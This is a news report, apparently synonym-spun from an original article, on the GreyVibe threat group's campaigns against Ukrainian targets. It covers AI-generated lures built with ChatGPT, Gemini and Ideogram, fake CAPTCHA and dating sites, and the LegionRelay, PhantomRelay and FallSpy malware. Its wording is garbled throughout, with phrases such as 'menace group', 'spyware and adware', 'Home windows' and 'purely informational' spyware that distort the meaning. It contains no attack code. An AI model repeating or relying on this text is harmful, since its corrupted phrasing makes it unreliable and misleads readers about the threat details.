GreyVibe hackers use ChatGPT and Gemini to power cyberattacks

The Russian menace group tracked as GreyVibe makes use of AI-generated decoys and a wealthy set of customized malware instruments to focus on organizations within the army, authorities, civilian, and enterprise sectors.

Though this cyberespionage marketing campaign has been lively since a minimum of August 2025 and seems to be aligned with the pursuits of the Russian state, researchers can’t confidently classify it as a nation-state operation.

Cybersecurity agency WithSecure found the exercise in January and decided it was targeted on Ukraine or Ukrainian-related entities.

Hyperlinks to Russian-speaking attackers are supported by the malware panel language, feedback in code artifacts, and command and management (C2) server time set to UTC+3 (Moscow time).

In response to the researchers, GreyVibe used a number of assault chains towards its targets, together with:

• PhantomMail: Spear phishing emails that ship malicious ZIP/RAR archives through Google Drive and 4sync hyperlinks utilizing decoy PDFs and pretend errors throughout malware deployment. The noticed decoys impersonated Ukrainian authorities, emergency, telecommunications, and power utilities.
• PhantomClick: Faux CAPTCHA/ClickFix pages masquerading as Zoom and LAPAS websites trick victims into operating self-infecting instructions via a pretend Cloudflare verification immediate.
• PrincessClub: A pretend Ukrainian grownup/relationship web site that distributes Android spyware and adware FallSpy and Home windows malware PhantomRelay/LegionRelay. The operator used a pretend feminine Telegram persona after which added a WebRTC-based dwell name that would seize the sufferer’s audio/video.
• DroneLink: FPV drone and UAV-themed pretend Ukrainian army charity web site shared infrastructure and instruments with the PrincessClub marketing campaign.
• Nebo: A pretend “СПО НЕБО” Russian army communications login web page might have been designed to trick Ukrainian army personnel into believing they’re accessing a Russian army terminal.

The variability and high quality of those lures is notable, and WithSecure says that is the results of utilizing a number of AI instruments, together with ChatGPT, Ideogram AI, and Google Gemini, to generate detailed and life like content material to assist them.

The usage of AI has additionally prolonged to the creation of instruments, with researchers mentioning LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP. These are all customized obfuscators that seem to have been developed with the assistance of LLM.

A PowerShell-based distant entry Trojan named LegionRelay was additionally possible developed with the assistance of AI instruments, researchers mentioned.

LegionRelay helps file theft, screenshot seize, browser credential theft, Telegram and WhatsApp knowledge leaks, and RDP entry setup.

One other malware utilized by GreyVibe is PhantomRelay, which can be a PowerShell RAT. The malware helps system fingerprinting, dynamic script loading, and PowerShell and Home windows command execution.

Lastly, hackers used the purely informational Android spyware and adware FallSpy within the PrincessClub and Nebo campaigns.

The malware collects contact lists, name logs, gadget and community data, location knowledge, media information, and SIM data.

WithSecure notes that whereas GreyVibe’s exercise is in keeping with that of a nation-state, the attacker “lacked the extent of sophistication and operational self-discipline usually related to mature nation-state attackers.”

Moreover, though PhantomRelay malware has additionally been noticed in cybercriminal exercise, researchers had been capable of distinguish its utilization from state-aligned exercise. This led researchers to imagine that GreyVibe might include “present or former cybercriminals.”

Some proof for this idea consists of the use in preliminary and take a look at samples of a proprietary ISO builder related to a gaggle of former Trickbot members (UAC-0098) that focused Ukraine in the beginning of the Russian invasion.

Moreover, the attackers uploaded improvement and take a look at samples to public scanning platforms, which isn’t widespread amongst nation-state actors. Moreover, a cryptocurrency miner was deployed on some sufferer machines.

The researchers are not sure whether or not “former or present cybercrime members have been absorbed into state-sponsored teams, function independently however with state-directed missions, or kind hybrid groups that embody state-affiliated and cybercrime members.”

Organizations can use the indications of compromise (IoCs) offered by WithSecure to arrange defenses towards GreyVibe’s malicious exercise.